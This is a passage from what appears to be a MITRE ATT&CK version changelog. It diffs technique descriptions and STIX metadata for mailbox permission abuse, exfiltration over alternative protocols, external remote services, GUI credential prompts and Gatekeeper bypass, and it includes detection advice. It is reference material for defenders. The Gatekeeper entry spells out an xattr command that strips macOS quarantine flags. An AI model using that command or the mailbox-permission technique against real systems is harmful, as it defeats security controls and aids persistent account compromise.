> in Plain Sight 2018)  This may be used in persistent threat> in Plain Sight 2018)  Adversaries may also assign mailbox f
> incidents as well as BEC (Business Email Compromise) incide>older permissions through individual folder permissions or r
>nts where an adversary can assign more access rights to the >oles. Adversaries may assign the Default or Anonymous user p
>accounts they wish to compromise. This may further enable us>ermissions or roles to the Top of Information Store (root), 
>e of additional techniques for gaining access to systems. Fo>Inbox, or other mailbox folders. Bassigning one or both us
>r example, compromised business accounts are often used to s>er permissions to a folder, the adversary can utilize any ot
>end messages to other accounts in the network of the target >her account in the tenant to maintain persistence to the tar
>business while creating inbox rules (ex: [Internal Spearphis>get user’s mail folders.(Citation: Remediation and Hardening
>hing](https://attack.mitre.org/techniques/T1534)), so the me> Strategies for Microsoft 365 to Defend Against UNC2452)  Th
>ssages evade spam/phishing detection mechanisms.(Citation: B>is may be used in persistent threat incidents as well as BEC
>ienstock, D. - Defending O365 - 2019)> (Business Email Compromise) incidents where an adversary ca
 >n assign more access rights to the accounts they wish to com
 >promise. This may further enable use of additional technique
 >s for gaining access to systems. For example, compromised bu
 >siness accounts are often used to send messages to other acc
 >ounts in the network of the target business while creating i
 >nbox rules (ex: [Internal Spearphishing](https://attack.mitr
 >e.org/techniques/T1534)), so the messages evade spam/phishin
 >g detection mechanisms.(Citation: Bienstock, D. - Defending 
 >O365 - 2019)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-04 19:18:36.254000+00:002021-10-18 18:57:04.148000+00:00
descriptionAdversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
external_references[4]['source_name']Bienstock, D. - Defending O365 - 2019Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452
external_references[4]['description']Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.
external_references[4]['url']https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html
x_mitre_detectionMonitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. Enable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Bienstock, D. - Defending O365 - 2019', 'description': 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.', 'url': 'https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365'}
x_mitre_contributorsMicrosoft Detection and Response Team (DART)
x_mitre_contributorsMike Burns, Mandiant
x_mitre_contributorsNaveen Vijayaraghavan, Nilesh Dherange (Gurucul)
x_mitre_data_sourcesApplication Log: Application Log Content

[T1048] Exfiltration Over Alternative Protocol

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may steal data by exfiltrating it over a differet1Adversaries may steal data by exfiltrating it over a differe
>nt protocol than that of the existing command and control ch>nt protocol than that of the existing command and control ch
>annel. The data may also be sent to an alternate network loc>annel. The data may also be sent to an alternate network loc
>ation from the main command and control server.    Alternate>ation from the main command and control server.    Alternate
> protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other> protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other
> network protocol not being used as the main command and con> network protocol not being used as the main command and con
>trol channel. Different protocol channels could also include>trol channel. Different protocol channels could also include
> Web services such as cloud storage. Adversaries may also op> Web services such as cloud storage. Adversaries may also op
>t to encrypt and/or obfuscate these alternate channels.   [E>t to encrypt and/or obfuscate these alternate channels.   [E
>xfiltration Over Alternative Protocol](https://attack.mitre.>xfiltration Over Alternative Protocol](https://attack.mitre.
>org/techniques/T1048) can be done using various common opera>org/techniques/T1048) can be done using various common opera
>ting system utilities such as [Net](https://attack.mitre.org>ting system utilities such as [Net](https://attack.mitre.org
>/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct >/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 
>2016) >2016) On macOS and Linux <code>curl</code> may be used to in
 >voke protocols such as HTTP/S or FTP/S to exfiltrate data fr
 >om a system.(Citation: 20 macOS Common Tools and Techniques)
 > 

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:50:31.548000+00:002021-10-15 22:49:28.766000+00:00
descriptionAdversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)
external_references[2]['source_name']University of Birmingham C220 macOS Common Tools and Techniques
external_references[2]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[2]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'}
x_mitre_contributorsWilliam Cain

[T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:45:51.014000+00:002021-10-15 22:44:11.953000+00:00
x_mitre_version1.01.1

[T1041] Exfiltration Over C2 Channel

Current version: 2.1

Version changed from: 2.0 → 2.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-12 15:59:47.470000+00:002021-10-15 22:45:50.620000+00:00
x_mitre_version2.02.1

[T1052] Exfiltration Over Physical Medium

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:31:48.713000+00:002021-10-15 22:48:29.702000+00:00
x_mitre_version1.11.2

[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:50:31.361000+00:002021-10-15 22:49:28.421000+00:00
x_mitre_version1.01.1

[T1567] Exfiltration Over Web Service

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 01:02:24.276000+00:002021-10-15 22:50:29.607000+00:00
x_mitre_version1.01.1

[T1052.001] Exfiltration Over Physical Medium: Exfiltration over USB

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['William Cain']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:31:02.204000+00:002021-10-15 22:48:29.490000+00:00
x_mitre_version1.01.1

[T1203] Exploitation for Client Execution

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 19:06:02.690000+00:002021-10-15 19:01:34.932000+00:00
x_mitre_remote_supportTrueFalse
x_mitre_version1.11.2

[T1133] External Remote Services

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1Adversaries may leverage external-facing remote services to t1Adversaries may leverage external-facing remote services to 
>initially access and/or persist within a network. Remote ser>initially access and/or persist within a network. Remote ser
>vices such as VPNs, Citrix, and other access mechanisms allo>vices such as VPNs, Citrix, and other access mechanisms allo
>w users to connect to internal enterprise network resources >w users to connect to internal enterprise network resources 
>from external locations. There are often remote service gate>from external locations. There are often remote service gate
>ways that manage connections and credential authentication f>ways that manage connections and credential authentication f
>or these services. Services such as [Windows Remote Manageme>or these services. Services such as [Windows Remote Manageme
>nt](https://attack.mitre.org/techniques/T1021/006) can also >nt](https://attack.mitre.org/techniques/T1021/006) and [VNC]
>be used externally.  Access to [Valid Accounts](https://atta>(https://attack.mitre.org/techniques/T1021/005) can also be 
>ck.mitre.org/techniques/T1078) to use the service is often a>used externally.(Citation: MacOS VNC software for Remote Des
> requirement, which could be obtained through credential pha>ktop)  Access to [Valid Accounts](https://attack.mitre.org/t
>rming or by obtaining the credentials from users after compr>echniques/T1078) to use the service is often a requirement, 
>omising the enterprise network.(Citation: Volexity Virtual P>which could be obtained through credential pharming or by ob
>rivate Keylogging) Access to remote services may be used as >taining the credentials from users after compromising the en
>a redundant or persistent access mechanism during an operati>terprise network.(Citation: Volexity Virtual Private Keylogg
>on.  Access may also be gained through an exposed service th>ing) Access to remote services may be used as a redundant or
>at doesn’t require authentication. In containerized environm> persistent access mechanism during an operation.  Access ma
>ents, this may include an exposed Docker API, Kubernetes API>y also be gained through an exposed service that doesn’t req
> server, kubelet, or web application such as the Kubernetes >uire authentication. In containerized environments, this may
>dashboard.(Citation: Trend Micro Exposed Docker Server)(Cita> include an exposed Docker API, Kubernetes API server, kubel
>tion: Unit 42 Hildegard Malware)>et, or web application such as the Kubernetes dashboard.(Cit
 >ation: Trend Micro Exposed Docker Server)(Citation: Unit 42 
 >Hildegard Malware)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 20:22:02.443000+00:002021-08-19 16:57:27.209000+00:00
descriptionAdversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop) Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
external_references[2]['source_name']Volexity Virtual Private KeyloggingMacOS VNC software for Remote Desktop
external_references[2]['description']Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.
external_references[2]['url']https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
external_references[3]['source_name']Trend Micro Exposed Docker ServerVolexity Virtual Private Keylogging
external_references[3]['description']Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.
external_references[3]['url']https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.htmlhttps://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
external_references[4]['source_name']Unit 42 Hildegard MalwareTrend Micro Exposed Docker Server
external_references[4]['description']Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.
external_references[4]['url']https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 Hildegard Malware', 'description': 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.', 'url': 'https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/'}
x_mitre_platformsmacOS

[T1606] Forge Web Credentials

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 14:29:27.631000+00:002021-10-12 14:26:52.179000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsIaaS

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may mimic common operating system GUI componentst1Adversaries may mimic common operating system GUI components
> to prompt users for credentials with a seemingly legitimate> to prompt users for credentials with a seemingly legitimate
> prompt. When programs are executed that need additional pri> prompt. When programs are executed that need additional pri
>vileges than are present in the current user context, it is >vileges than are present in the current user context, it is 
>common for the operating system to prompt the user for prope>common for the operating system to prompt the user for prope
>r credentials to authorize the elevated privileges for the t>r credentials to authorize the elevated privileges for the t
>ask (ex: [Bypass User Account Control](https://attack.mitre.>ask (ex: [Bypass User Account Control](https://attack.mitre.
>org/techniques/T1548/002)).  Adversaries may mimic this func>org/techniques/T1548/002)).  Adversaries may mimic this func
>tionality to prompt users for credentials with a seemingly l>tionality to prompt users for credentials with a seemingly l
>egitimate prompt for a number of reasons that mimic normal u>egitimate prompt for a number of reasons that mimic normal u
>sage, such as a fake installer requiring additional access o>sage, such as a fake installer requiring additional access o
>r a fake malware removal suite.(Citation: OSX Malware Exploi>r a fake malware removal suite.(Citation: OSX Malware Exploi
>ts MacKeeper) This type of prompt can be used to collect cre>ts MacKeeper) This type of prompt can be used to collect cre
>dentials via various languages such as AppleScript(Citation:>dentials via various languages such as [AppleScript](https:/
> LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malw>/attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm 
>are) and PowerShell(Citation: LogRhythm Do You Trust Oct 201>Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati
>4)(Citation: Enigma Phishing for Credentials Jan 2015). >on: Spoofing credential dialogs) and [PowerShell](https://at
 >tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do
 > You Trust Oct 2014)(Citation: Enigma Phishing for Credentia
 >ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux
 > systems attackers may launch dialog boxes prompting users f
 >or credentials from malicious shell scripts or the command l
 >ine (i.e. [Unix Shell](https://attack.mitre.org/techniques/T
 >1059/004)).(Citation: Spoofing credential dialogs) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 20:56:14.853000+00:002021-08-24 18:21:07.926000+00:00
descriptionAdversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)
external_references[5]['source_name']Enigma Phishing for Credentials Jan 2015Spoofing credential dialogs
external_references[5]['description']Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.
external_references[5]['url']https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
x_mitre_detectionMonitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Enigma Phishing for Credentials Jan 2015', 'description': 'Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.', 'url': 'https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/'}
x_mitre_data_sourcesScript: Script Execution
x_mitre_data_sourcesCommand: Command Execution
x_mitre_platformsLinux

[T1553.001] Subvert Trust Controls: Gatekeeper Bypass

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify file attributes that signify programst1Adversaries may modify file attributes that signify programs
> are from untrusted sources to subvert Gatekeeper controls. > are from untrusted sources to subvert Gatekeeper controls i
>In macOS and OS X, when applications or programs are downloa>n macOS. When documents, applications, or programs are downl
>ded from the internet, there is a special attribute set on t>oaded an extended attribute (xattr) called <code>com.apple.q
>he file called <code>com.apple.quarantine</code>. This attri>uarantine</code> can be set on the file by the application p
>bute is read by Apple's Gatekeeper defense program at execut>erforming the download. This attribute, also known as a quar
>ion time and provides a prompt to the user to allow or deny >antine flag, is read by Apple's Gatekeeper defense program w
>execution.   Apps loaded onto the system from USB flash driv>hen the file is run and provides a prompt to the user to all
>e, optical disk, external hard drive, or even from a drive s>ow or deny execution. Gatekeeper also monitors an applicatio
>hared over the local network won’t set this flag. Additional>n's usage of dynamic libraries (dylibs) loaded outside the a
>ly, it is possible to avoid setting this flag using [Drive-b>pplication folder on any quarantined binary, often using the
>y Compromise](https://attack.mitre.org/techniques/T1189). Th> <code>dlopen</code> function. If the quarantine flag is set
>is completely bypasses the built-in Gatekeeper check. (Citat> in macOS 10.15+, Gatekeeper also checks for a notarization 
>ion: Methods of Mac Malware Persistence) The presence of the>ticket and sends a cryptographic hash to Apple's servers to 
> quarantine flag can be checked by the xattr command <code>x>check for validity for all unsigned executables.(Citation: T
>attr /path/to/MyApp.app</code> for <code>com.apple.quarantin>heEclecticLightCompany apple notarization )(Citation: Bypass
>e</code>. Similarly, given sudo access or elevated permissio>ing Gatekeeper)  The quarantine flag is an opt-in system and
>n, this attribute can be removed with xattr as well, <code>s> not imposed by macOS. If an application opts-in, a file dow
>udo xattr -r -d com.apple.quarantine /path/to/MyApp.app</cod>nloaded from the Internet will be given a quarantine flag be
>e>. (Citation: Clearing quarantine attribute) (Citation: Oce>fore being saved to disk. Any application or user with write
>anLotus for OS X)   In typical operation, a file will be dow> permissions to the file can change or strip the quarantine 
>nloaded from the internet and given a quarantine flag before>flag. With elevated permission (sudo), this attribute can be
> being saved to disk. When the user tries to open the file o> removed from any file. The presence of the <code>com.apple.
>r application, macOS’s gatekeeper will step in and check for>quarantine</code> quarantine flag can be checked with the xa
> the presence of this flag. If it exists, then macOS will th>ttr command <code>xattr -l /path/to/examplefile</code>. Simi
>en prompt the user to confirmation that they want to run the>larly, this attribute can be recursively removed from all fi
> program and will even provide the URL where the application>les in a folder using xattr, <code>sudo xattr -d com.apple.q
> came from. However, this is all based on the file being dow>uarantine /path/to/folder</code>.(Citation: 20 macOS Common 
>nloaded from a quarantine-savvy application. (Citation: Bypa>Tools and Techniques)(Citation: TheEclecticLightCompany Quar
>ssing Gatekeeper)>antine and the flag)(Citation: theevilbit gatekeeper bypass 
 >2021)  Apps and files loaded onto the system from a USB flas
 >h drive, optical disk, external hard drive, from a drive sha
 >red over the local network, or using the <code>curl</code> c
 >ommand do not set this flag. Additionally, it is possible to
 > avoid setting this flag using [Drive-by Compromise](https:/
 >/attack.mitre.org/techniques/T1189), which may bypass Gateke
 >eper. (Citation: Methods of Mac Malware Persistence)(Citatio
 >n: Clearing quarantine attribute)(Citation: OceanLotus for O
 >S X)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:41:20.063000+00:002021-10-14 21:18:30.629000+00:00
descriptionAdversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X) In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile. Similarly, this attribute can be recursively removed from all files in a folder using xattr, sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)
external_references[1]['source_name']Methods of Mac Malware PersistenceTheEclecticLightCompany apple notarization
external_references[1]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.
external_references[1]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://eclecticlight.co/2020/08/28/how-notarization-works/
external_references[2]['source_name']Clearing quarantine attributeBypassing Gatekeeper
